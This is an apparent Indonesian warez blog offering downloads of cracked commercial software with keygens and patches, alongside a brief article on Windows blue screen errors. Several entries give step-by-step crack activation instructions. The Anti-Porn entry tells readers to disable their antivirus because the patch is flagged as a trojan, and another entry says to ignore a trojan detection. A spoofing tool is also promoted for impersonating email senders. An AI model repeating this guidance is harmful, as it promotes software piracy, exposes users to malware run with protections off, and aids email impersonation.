- Power - Using Image for DOS or Image for Linux (each of which is included with the purchase of Image for Windows) versions gives you the ability to recover your data, even if Windows won't start.
- Network Support - Save backups to any drive accessible to Windows itself.
- RAID Support - Works seamlessly with on-board hardware- and firmware-based RAID.
- Command Line Support - Powerful, complete command line support is built in, allowing you to automate backup or restore procedures.
- Scheduling - Leverages the built-in Windows scheduler via the simple click of a Schedule Backup button.
- Image File Validation - Allows you to thoroughly check the integrity of the disk image files, either as part of the backup process, or at any time thereafter. TeraByte imaging products are renown for their thorough and accurate validation process.
- Restored Partition Expansion - When restoring an image, you can expand the restored partition to occupy any free space that would be left over.
- Selectable Image File Sizes - If desired, you can specify a maximum size for the disk image files that are created. This allows you to create image files that readily fit on the removable media of your choice.
- Hardware Independent Restore - Restore Windows to completely different hardware and then use the TeraByte OSD Tool Suite to install the drivers required to support the new hardware.


Sumber : All Is Free

Read more


RemoveIT Pro 4 SE 8.6.2011 Full Version



NB : Klik Gambar Untuk Download

RemoveIT Pro removes many viruses that other popular antivirus software cannot discover. If you can't clean your computer from worms and viruses, adwares and spywares, then you should try with this software. RemoveIT Pro is an easy-to-use security software that allows you to protect your PC.

RemoveIT Pro program is specific because he detects malicious files and viruses that many other popular programs does not detect. It also offers you full report of active processes with full paths and full windows startup list of files that starts on windows startup.

Locate and remove many new dangerous files including Spyware, Malware, Virus, Worm, Trojan and Adware that other popular AV programs cannot find.



Sumber : All Is Free

Read more


Internet Download Manager 6.06 Beta Build 7 Full ( Patch + Crack And Keygen )



NB : Klik Gambar Buat Download

Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download accelerators and managers that segment files before downloading starts, Internet Download Manager segments downloaded files dynamically during download process. Internet Download Manager reuses available connections without additional connect and login stages to achieve better acceleration performance

Sumber : All Is Free

Read more


Plato Photo Booth 12.05.01 Full Serial



NB : Klik Gambar Buat Download

Butuh software seperti yang digunakan photobox?? Mungkin sobat blogger bisa menggunakan software yang satu ini, yakni Plato Photo Booth 12.05.01 Full Serial. Plato Photo Booth memungkinkan Anda dengan mudah membuat, mengedit, meningkatkan, mencetak, dan memanipulasi foto digital Anda. Ini adalah alat yang sangat profesional entertainment tool.

Why Popular and Excellent of Plato Photo Booth?
excellent Take Photos by yourself with best quaility:
Plato Photo Booth can let you take photos just at home,like a adhesive sticker machine.

Edit Photos :
It can edit photos through altering the color,frames or add decorration and base map untill your
are satisfited.

Print out photo
Not only save photos on your computer to share with your friends but also can print it out and then put it in the wallet or stick it on your cellphone.

Key Features of Plato Photo Booth:
  • include kinds of background like ocean,flowers..
  • Add single frames by yourself..
  • edit the photos on your pc in the image editor.
  • add decorations to the photos.
  • add base pictures to the photos.
  • combine the photos as you like.
  • capture and print out photos.
INFO : File installer di deteksi sebagai trojan (scan with vipre antivirus), padahal saya langsung download dari situs resminya, jadi kemungkinan false alarm, di ignore aja.

Read more


Anti-Trojan Elite 5.4.4 Full ( Keygen + Patch )



NB : Klik Gambar Buat Download

Anti Trojan Elite(ATE) is a malware remover, it can detect and clean malware in disk or memory.Anti Trojan Elite provide a real-time malware firewall for user, once a trojan or keylogger would been loaded, the ATE can detect, block and then clean it in time before it starts. The ATE can detect more than 22000 trojans, worms and keyloggers currently, and the number of malware ATE could clean is growing up very quickly, we collect world-wide malwares, user can using our auto live update feature to get the power to clean these new malwares in time.

Anti Trojan Elite has some useful utilities especially. The network utility can been used to disconnect suspicious TCP connections; The process utility can been used to kill suspicious processes even the process has the system priviage, even it has the ability to unload suspicious modules in all processes; The registry repair utility can been used to repair registry altered by malware; The registry monitor utility can been used to repair any change of important registry keys and values with real time.

THE REASONS CHOOSE ANTI TROJAN ELITE
- Real-time malware firewall, protecting user's computer in real-time.
- Detecting and cleaning binded malware, doesn't hurt normal file and clean the malware.
- Detecting and cleaning no process malware, some malware don't have a EXE file, they are only some DLL files and running as some threads in other process, ATE can detect and clean this type of malware even it's running.
- Free tools. View the information of Tcp/Ip states and processes informations.

FEATURES
- Disk and memory scan supported.
- Real-time malware firewall.
- Compressed files (RAR ZIP CAB) scan supported.
- Backup module: Backup trojan files before killing.
- Network Manager. View the tcp/udp states and the processes they belonged to. User can disconnect any tcp connection and stop the opposite process.
- Process manager. View the processes and its DLL modules' information. User can terminate any process and unload any DLL module.
- Internet Explorer and registry repair utility.
- Updating online supported, and auto check updates when ATE starts.
- Real-time registry monitor utility.

OS : Win XP/2000/Vista/Win 7
Language : Multilingual



Sumber : All Is Free

Read more


Earth Alerts 2011.1.112 ( Portable Full Version )



NB : Klik Gambar Buat Download

Earth Alerts is a Windows-based application that allows you to monitor in near real-time a variety of natural hazard events that are occurring anywhere around the world. Alert notifications, reports, and imagery provide the user with a convenient way to view natural phenomenon as they occur, whether close to home or some far-flung corner of the globe!

Earth Alerts uses a variety of online resources provided by organizations such as the National Weather Service, U.S. Geological Survey and Smithsonian Institution (just to name a few), to identify what sort of activities "Mother Earth" is currently dishing out on the planet.

To use Earth Alerts, you simply select the specific natural hazards -- earthquakes, tsunamis, volcanoes, tropical cyclones, wildland fires, landslides, severe weather, local weather, etc. -- and the locations that interest you. Earth Alerts will get the latest information from various live data feeds available on the Internet and present it to you in a convenient arrangement of reports, maps and images.

Here are some key features of "Earth Alerts":

· Global activity overview: earthquakes, tsunamis, volcanoes, and tropical cyclones (typhoons, hurricanes, tropical storms, tropical depressions and other disturbances)
· Activity for user-selected Global locations (anywhere outside the U.S.): local earthquakes, local weather including current conditions, forecasts and satellite imagery
· United States activity overview: severe weather including special tornado and severe thunderstorm watches, volcanoes, wildland fires (wildfires), and landslide related hazards
· Activity for user-selected United States locations: local earthquakes; local wildland fires; local weather including NWS weather/hazard alerts, current conditions, forecasts and radar/satellite imagery
· Google Earth™ integration provides visualizations of recent earthquake events, volcanoes, tropical cyclones, wildland fires and severe weather warnings. Google Earth™ integration also provides high resolution views of any user-selected U.S. or Global location
· Visual and sound notifications on your Windows desktop identifying active alerts
· Email notifications of active alerts
· Mobile phone text message (SMS) alert notifications of active tsunami watches / warnings, magnitude 5.0+ earthquakes, major volcanic eruptions and tornado warnings.


Sumber : All Is Free

Read more


Chillin and Chillin 3D Visual Style



NB : Klik Gambar Buat Download


Year : 2011 | OS : Windows 7
 

2 Variations:
- Chillin (Flat Interface; Minimal)
- Chillin3D (Full Shadow, Provides Depth and Perception)

Installation:

1.) Drag both 'Chillin.theme' and the 'Theme' folder to 'C:\Windows\Resources\Themes\'

2.) Right click on desktop -> Personalize...there you should see in Installed Themes.

Click on it to apply theme. 


Sumber : All Is Free

Read more


Google Chrome 11.0.696.77 Final ( Portable Full Version )



NB : Klik Gambar Buat Download

Google Chrome is a browser that combines a minimal design with sophisticated technology to make the web faster, safer, and easier. In Google Chrome, you can get anywhere on the Web with one box. The address bar that sits at the top of the normal Google Chrome window simplifies your Internet experience by doubling as a search box. You can also use it to bookmark websites and stay aware about the security of a website.

Search
Type your search query in the address bar, and it automatically suggests related queries and popular websites, based on your input. (Google Suggest is the default service that provides auto-suggestions unless your default search engine uses an alternate service.)

Visit a webpage
If you know the specific web address you're trying to access, type it directly in the address bar. Press Enter on the keyboard or click the arrow icon to load the webpage. As you type, Google Chrome also automatically searches your browsing history and shows you the number of matches at the bottom of its drop-down menu.

Create a bookmark
If you come across an interesting webpage that you'd like to access again in the future, click the star icon on the browser toolbar to create a bookmark. A bubble confirming the addition of the bookmark appears. To tweak the bookmark's name, edit the text in the 'Name' field. Use the 'Folder' drop-down menu to choose where you want to store the bookmark. Learn more about organizing bookmarks. To tweak the bookmark's URL, click the Edit button. If you accidentally clicked the star icon, you can quickly revert your action by clicking the Remove link. Learn more about deleting bookmarks.

Website security
If Google Chrome detects that the website you're trying to access will securely transmit data using SSL, you'll see the following:
The background color of the address bar changes to gold.
The 'https' in the URL appears in green for websites with SSL-secured connections established.
A lock icon appears at the end of the address bar.
If a SSL-secured connection cannot be established, then you'll see an alert icon at the end of the address bar, among other possible browser warnings. You can click the icon to open the 'Security information' dialog box and see more information.

Size (RAR): 28 Mb
2% recovery record


Sumber : All Is Free

Read more


SpyMode DiscreetMail Professional v3.0.1 ( Full Version )



NB : Klik Gambar Buat Download

Discreetmail can be run from a floppy or CD to use on any computer or installed on your own computer. It starts up very quickly and allows the user to send emails using any email address you like as the sender. When the recipient receives the email, they will see that it has been sent from an email address you specified before sending. You can also encrypt emails before you send and NOBODY is able to decrypt them without a special code you previously chose. You can also encrypt files and other images to keep them 100% secure and away from prying eyes! Great for sending anonymous emails or impersonating an email address and keeping your files completely private! It is password protected so nobody is able to use the software without the correct password. Attachments can be encrypted and added to emails and they can be saved for later retrieval. Version 3.0 will also auto detect your mail server address or the recipients mail server address so setting up and sending emails couldn't be easier.

Sumber : All Is Free

Read more


Logo Maker Software 8.0.2011 Multilingual Full ( patch + Keygen )



NB : Klik Gambar Buat Download

Logo creation made easy with logo design software. Create attractive and professional logos with just a few clicks!
1800+ predesigned stunning logo templates.
5000 beautifully designed vector graphics.
300+ fonts and ready text styles for logo creation.
Export in TIFF, PNG, JPG, BMP, GIF, PDF and Vector EPS formats.
Apply color adjustments, filters and various effects.
Enhanced! 1500 high quality Logo templates

Now, you can choose from 1500 pre- designed templates. Logosmartz has added a wide collection of high quality, professionally designed logo templates.
4000 high quality vector graphic symbols
You have access to over 4000 high quality vector graphic symbols and over a 100 fonts while creating a logo.
Enhanced! Pre defined Text Styles
With Logosmartz you can also use predefined text styles such as arc text, concave text etc which can be readily applied to text.
New! Filters
Logosmartz comes with filters like grayscale, invert, sharpen, emboss and water to provide special effects to your logo elements.
New! Fill with picture
This unique functionality allows you to mask any image to the selected symbol, shape or text.
Easily customizable, add special effects to text and symbols
The new LogoSmartz offers various incredible effects that you can apply to text and symbols. Blur effect has been added to Logosmartz. The existing effects include Gradient effects, Shadow effects, Bevel effects, and Outline effects. Using these, you can create many distinct logo options.
Import Fonts
You can import your system fonts to Logosmartz and use them as and when you like.
Layers
With the new Layers feature you can control the position of various objects in your logo; you can place a more important object over the other and create different effects.
New! Arrangement tools
Logosmartz comes with 3 arrangement tools, send backward and bring forward by one layer, group and ungroup, 6 alignment options which will assist you in arranging your logo elements.
New! Color palettes
Now, access 9 different Color palettes in Logosmartz. RGB palettes: Standard, Pastels, Primary, Metallic & Vivid AND CMYK palettes: Primary, Spectrum, Pastels and Dark shades . Apply colors to the logo objects from any Color Palette.
New! Color Picker
Use Color Picker tool to apply any desired color from the screen on your Logo.
Color Adjustments
Color Adjustments include Brightness, Contrast, Saturation and Hue properties .You can adjust these for text, symbols, shapes and images.
New! Blur
You can apply Blur effect on your logo objects and create a distinct logo.
New! Transparency
You can provide transparency effect to text, image, symbol or shape.
New! Flip
Flip vertical and horizontal feature can help you in designing an innovative logo.
New! Save Logo project as Template
You can save your designed logo as template in software; hence you can easily access your logo design in future from the templates itself!
New! Send Logo as Email
With Logosmartz, you can share your logo with others via E-mail as attachment.
New! Add Grid and Ruler
You can work on your logo more precisely with the help of view tools such as grid and ruler.
LogoSmartz predefined Color Styles
For convenience; LogoSmartz offers several predefined color styles that you can apply on logo symbols, shapes, text, and images. By applying these textures you can create various remarkable variations of your logo in no time. You can try as many styles before you finalize the one that you find most suitable for your logo. You can also customize these styles by replacing colors and changing opacity of fills etc.
Lock and Hide
Lock feature will allow you to lock the position of the objects that you do not want to change during designing process. Later these objects can be unlocked. On the other hand hide feature will hide the object which you do not want to appear on the logo during designing process. Later these objects can be unhidden.
Tagline Resource
Add taglines to your logo, from our huge tagline resource
Enhanced! Upload and customize Images to create your custom Logo
You can also import an image in PNG, GIF, JPEG, BMP and TIFF formats of any size and dimensions for logo creation. You can resize the image and use it as per your need.
Enhanced! Customizing the Stage
Customize the height and width of your stage as per your requirement .You can add color to the stage or fill it with image.
Lines and arcs
Logosmartz now allows you to create lines of any size, thickness and color, and even dashed lines. You provide arc to a line and customize it.
Enhanced! Logo Output is in 7 formats and in any size you want
Logosmartz 8.0 has Your logo becomes available to you in TIFF, JPG, GIF, PNG, PDF, BMP and Vector EPS. Vector EPS is a high resolution vector format ideal for printing while GIFs and JPEGs are low resolution and ideal for the Web. The TIFF and PNG are lossless formats that give high clarity output.
Create transparent Logos LogoSmartz allows you to create Transparent logos in PNG and GIF formats.
LogoSmartz Online Tutorial
To help you design logos using Logosmartz logo designing software, we have added an online tutorial.
LogoSmartz has multi-lingual support
Logosmartz application is geared to handle English, French and Spanish



Sumber : All Is Free

Read more


ZoneAlarm Pro v10.0.240.000 Full ( Keygen + Patch )



NB : Klik Gambar Buat Download

ZoneAlarm Pro - a well-known firewall designed to protect your computer from threats of all kinds at work on the Internet and local networks. The program provides excellent protection on the basis of the firewall, including the possibility of completely disconnect all network and Internet activity. Firewall has flexible configuration rules, which can be configured individually or use the preset rules. Filter Application (Access List), allows you to set access rights to the network for each program. There is a possibility of instantaneous automatic or manual blocking of access applications on the Internet. The program monitors incoming and outgoing mail, and can rename potentially dangerous attachments and put them in quarantine. Number of outgoing mail can be restricted to prevent mass mailings when infecting a computer, e-mail worms.

ZoneAlarm Pro also supports validation of digital signatures is a detailed log of events and has the means to analyze, with the subsequent issuance of textual and graphical information. Program features customizable control cookies, blocking the transfer of personal information about users on the Web-sites. Function block banner ads and pop-ups can get rid of annoying advertising, that are sensitive accelerates page loading speed.

Firewall triple protection:
- Goes beyond traditional PC firewalls to protect the entire PC from hackers, spyware and other Internet threats
- Blocks hackers, not giving them access to your computer
- Automatically makes your computer invisible on the Internet
- Spyware, preventing them from sending personal information over the Internet Users
- Protects the program and the operating system from malicious software

Powerful AntiSpyware:
- Scans and removes thousands of spyware traces from your computer
- Automatically removes the most dangerous viruses and useless to the user spyware
- "Clean" legal software monitoring (for example, Cookies for Web sites, which are often used)

Service protection (SmartDefense Service):
- Provides a PC user to a security update in real time and new ways to protect against attacks
- SmartDefense Adviser automatically delivers new models of spyware and viruses on the PC user for a modern defense
- DefenseNet supports the safety of PC, constantly renewing the base spyware and malware using the ZoneAlarm user community

Enhanced protection of personal data and privacy:
- Protects against theft of personal data and online backup
- Prevents the spread of personal user data from his computer without his consent
- Automatically stops pop-ads


Sumber : All Is Free

Read more


Your Uninstaller PRO v7.3.2011.2 Full ( Patch Keygen )



NB : Klik Gambar Buat Download

Untuk saat ini saya masih mengandalkan Your Uninstaller Pro untuk aktivitas uninstall program-program yang sudah tidak lagi saya gunakan. Dengan Your Uninstaller PRO v7.3.2011.2, proses uninstall pun menjadi lebih mudah, dan tentu hasilnya maksimal, karena menghapus sampai ke akar-akarnya, jadi bener-bener clean.

Cara aktivasi Your Uninstaller PRO v7.3.2011.2 :
  1. Install Your Uninstaller PRO v7.3.2011.2
  2. Sehabis install, jangan di jalankan (uncheck launch)
  3. Copy dan paste file patch yang ada di folder patch ke folder tempat anda menginstall YU2010. Misal : C:\Program files\Your Uninstaller 2010
  4. Klik kanan file patch "run administrator" dan klik patch.
  5. Jalankan keymaker (run as administrator juga)
  6. Jalankan Your Uninstaller PRO v7.3.2011.2, kemudian masukan key (enter key) yang di hasilkan oleh keymaker.
  7. Selesai, kini Your Uninstaller PRO v7.3.2011.2 sudah full versi

Sumber : Remo-Xp

Read more


Anti-Porn v16.0.6.1 Full Patch



NB : Klik Gambar Buat Download


Mengenalkan komputer dan internet kepada anak-anak memang perlu di lakukan oleh para orang tua sejak dini, akan tetapi kita juga perlu mengawasi anak-anak selama bermain di komputer, khusunys internet. Nah, untuk itu mungkin bapak/ibu membutuhkan aplikasi yang satu ini, yakni Anti-Porn v16.0.6.1 Full Patch.

Anti-Porn merupakan sebuah aplikasi yang secara khusus dibuat untuk memblokir situs-situs yang mengandung pornografi, memblokir akses ke file game, chat dll. Dengan menggunakan aplikasi ini, kita juga bisa memberi jadwal kapan game dan chat bisa di jalankan.

Main features:
  • Block porn web sites
  • Anti-porn blocks thousands of porn web sites and predatory words.You also can predefine thing you don't let kids to see, for example, web site and offensive words.At the same time, you can control the filtering accuracy.
  • Limit internet chat
  • Anti-porn can limit many popular chatting softwares and web chat chambers.
  • Limit internet access by day and time
  • You can easily assign internet access time at certain hours, even on specific day.A special feature of Anti-Porn is that the PC time will be calibrate as Greenwich Time.
  • Keep a complete log of the computer history
  • Anti-porn keeps a detail log of all web sites visited, blocked or not.
  • Record traffic data for an overview of internet use
  • You can take an inventory of your children's computer, and find all pictures, movies, music files and web pages.
  • Commend trusted web sites
  • Anti-porn has commended several websites, which are fit for children. You also can add in any others.
System requirements
  • Any PC running Windows 95/98/2000, Windows ME, Windows NT, Windows XP or Windows 7.
  • 16 MB RAM and 600KB of free hard disk space.
  • A mouse or other tracking device.
  • High Color display is recommended.
Cara aktivasi menggunakan patch :
  1. Install anti porn
  2. sehabi di install, jangan di jalankan, di close aja.
  3. Copy da paste file patch ke C:\Program Files\tuEagles. (WARNING : File patch di anggap trojan, jadi disable dulu antivirus yang anda gunakan)
  4. Klik kanan file patch, run as administrator untuk pengguna windows vista dan 7, untuk windows xp, klik 2x aja file patch nya.
  5. Klik patch, tunggu hingga bacaan sukses dan done.
  6. Jalankan anti porn
  7. Selesai

Sumber : Remo-Xp

Read more


Arti Error Pada Blue Screen Dan Cara Mengatasinya

Apakah Bluescreen itu? Blue screen of death (BSOD, Bahasa Inggris: Layar Biru Kematian), atau kadang disebut "layar biru" (bluescreen) saja adalah istilah populer untuk layar yang ditampilkan Microsoft Windows ketika mengalami kesalahan sistem (atau disebut stop error oleh Microsoft). BSOD milik Windows NT, 2000, XP, atau Vista biasanya lebih serius daripada Windows sebelumnya. Ada beberapa hal yang menyebabkan munculnya BSOD ini. Diantaranya driver peralatan yang tidak bagus, kesalahan memori, registry yang rusak atau penggunaan file DLL yang tidak cocok. Berbagai bentuk BSOD terdapat pada seluruh sistem operasi Windows sejak Windows 3.1. BSOD merupakan pengganti black screen of death (layar hitam kematian) yang muncul pada OS/2 dan MS-DOS.[1] Dalam versi awal dari Windows Vista juga terdapat red screen of death atau layar merah kematian, yang digunakan pada kesalahan boot loader. sumber wikipedia


Kerusakan ini biasanya terjadi saat booting dan muncul beberapa pesan yang muncul seperti di bawah ini:

* DATA_BUS_ERROR : kerusakan ini karena memori di motherboard rusak, solusinya bersihkan memori slot dari debu/kotoran yang melekat
* Machine_Check_exeption: Hal ini karena cacatnya CPU karena over-clock secara agresif, dan power supply yang kekurangan daya/rusak, solusinya kembalikan BIOS ke setting standar (default)
* NTFS_FILE_SYSTEM, FAT_FILE_SYSTEM (0X00000024) atau(0X000000023): karena adanya kerusajan pad partisi atau file sistem. Solusinya cek kabel data hard disk , perbaiki pin yang kendor atau bengkok.
* This error can occur if the Kernel32.dll file isi missing or damaged: Pesan ini karena kerusakan file kernel32.dll solusinya perbaiki Windows dari master Windows
* IRQL_NOT_LESS_OR_EQUAL (0X0000000A):pesan ini karena driver yg terinstall tidak kompatibel, atau permasalaha VGA card seperti overclock melebihi batas.. atau bisa jadi karena driver lama kita belum di hapus
* INACCESSIBLE_BOOT_DEVICE : Pesan ini karena disebakan adanya virus boot sector atau driver controller yang crash, solusinya , periksa konfigurasi jumper hard disk (master/salve), dan bersihkan virus denganc ara men-scanhard disk di komputer lain.
* BAD_POOL_CALLER: pesan ini karena driver tidak kompatibel dengan sistem. bisanya karena saat intstalasi windows xp dengan cara upgrade. Solusinya buang aplikasi antivirus dan lepas device yang menempel pada motherboard
* PEN_LIST_CORRUPT : adanya kerusakan pada memori, solusinya bersihkan memori dan slotnya. Jika tetaperror ganti memori
* VIDEO_DRIVER_INIT_FAILURE : karena keslahan instaliasi driver video card atau driver yang tidak update. Solusinya uninstall driver yang lama , kemudian instal ulang driver video card yang baru.
 

Read more

SoftwarGratis. Diberdayakan oleh Blogger.

Saya adalah Seorang anak muda berumur 16 tahun yang sebentar lagi 17 tahun di bulan juni ini saya dahalu punya blog juga ini blog ketiga saya blog lama saya semua tentang cheat saya bosen posting cheat jadi saya pindah aliran ke software kenapa saya pindah? karena kalau software itu tidak akan mati sedangkan cheat pasti ada pasang surutnya jadi saya harap dengan membuat blog Software Gratis ini bisa bermanfaat buat masbro :D regards JohnBrotha

Translate This

English French German Spain

Italian Dutch Russian Brazil

Japanese Korean Arabic Chinese Simplified
Translate Widget by Google

Data Anda

IP

Jam Blog saya

Followers

Tukaran Link

Software Gratis

Blog Archive

Radio Blog

adf.ly - shorten links and earn money!
Google PageRank Checker
Web hosting for webmasters